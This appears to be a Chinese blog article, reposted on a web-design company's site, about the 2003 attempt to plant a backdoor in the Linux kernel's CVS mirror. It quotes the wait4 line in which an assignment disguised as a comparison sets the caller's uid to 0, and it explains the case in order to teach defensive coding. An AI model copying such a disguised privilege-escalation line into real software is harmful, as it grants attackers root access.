2021-02-25 分类: 网站建设
Linux内核是开源的代码,能不能向其中安插一个后门呢?这是一件难度很高的操作,但是有人却差点儿成功了,我们来看看这是怎么回事。
时间回到2003年,当时Linux内核的代码主仓库保存在一个叫做BitKeeper的商业软件中。如果想对Linux内核代码进行修改的话,需要走一个审批流程,以此来确定这次更改能否被接受。每一次更改都有一个简单的说明,其中包含一个指向审批记录的链接。
但是有些人不喜欢BitKeeper(堂堂的Linux怎么能保存在闭源的商业软件中?!), 于是一个CVS(估计好多人都没听说过它了吧)被建立了起来,其中保存着从BitKeeper clone来的代码, 这样开发人员可以用开源的CVS来访问Linux代码。
2003年11月5号,Larry McVoy 注意到了一件怪事,CVS中的一个代码变更没有包含审批记录的链接, 这是怎么回事?
经过一番调查发现:从来没有人批准过这个代码变更,奇怪的是,这个代码变更并没有出现在BitKeeper主仓库中,原来是有人黑进了CVS的服务器,偷偷插入了一段代码。这段代码到底做了什么事情呢?
这段代码修改了一个叫做wait4的Linux函数,程序可以使用wait4来等待一些事情的发生,这个代码变更增加了这么两行:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;
(代码可左右滑动,懂得C语言的同学可以思考下,这段代码有什么不寻常的?)
粗一看这段代码,就会觉得这没啥啊?不就是做一点条件检查吗,不满足条件就返回错误。
但是仔细看看就会发现事情不对,第一行的最后, 有个"current->uid=0", 而不是 "current->uid == 0" 。
正常的写法应该是“==0”, 就是检查当前的用户ID是不是0, 写成“=0”就是把当前用户ID设置为0 , 而ID为0的用户是"root" !
这就意味着,如果这段代码被执行,当前用户就会变成root,可以在系统中为所欲为!
这其实是个经典的后门, 想象一个,一个黑客在Linux运行了一个程序,这个程序调用了wait4, 然后这个黑客突然间具备了root权限!
这个后门可是真够聪明的,伪装成了条件检查,试图蒙混过关,如果一直没人发现会怎么样呢?
首先,后门存在CVS中,不在BitKeeper的主仓库中,从BitKeeper 代码库Build出的Linux肯定没问题, 但是如果有人从CVS代码库中build了Linux, 那就中招了。
其次,搞破坏的家伙可能有这样的预期:有个被Linus Torvalds所信任的内核开发者,他讨厌BitKeeper,并且在使用CVS, 那当他修改了代码,准备通过邮件的方式向Linus Torvalds发送patch的时候发现,咦,wait4这里也有个code change, 是做条件检查的,也包括进去吧。Linus收到补丁,一看是自己信任的兄弟提交的,没有仔细检查,于是后门代码进入了主代码仓库。
这当然是猜测的场景,也算是一种社会工程学攻击吧,不过Linux团队非常小心,把这个后门给揪了出来。
故事到这里就可以结束了,再就这个话题扩展一下,多说两句。
我记得刚工作的时候,有个同事给我说,在C语言中,当需要和0比较的时候,可以把0放到前面,这么写:
if( 0 == user_id){ ....... }
这样即使把 == 写成了 = , 编译器就会发现错误。我当时觉得挺古怪的,把一个数字放到前面,变量放到后面。后来习惯了,在Java 也经常会这样写 if (null == user){ ...... }
其实现在的IDE都很智能了,像这种把==写成=的情况,IDE就可以给出警告。即使没有用IDE,如果对源码做静态的代码分析,也会被抓出来的警告的。
Linux是开源的代码,任何人,只要你愿意,都可以查看所有的代码,这相当于把Linux放到了阳光底下,无数双眼睛都盯着看,这种透明度使得在其中安插一个后门是非常难的。
分享文章:如何在Linux中安插一个后门?
本文地址:/news46/102846.html
成都网站建设公司_创新互联,为您提供微信小程序、响应式网站、网站设计公司、域名注册、微信公众号、定制网站
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联
猜你还喜欢下面的内容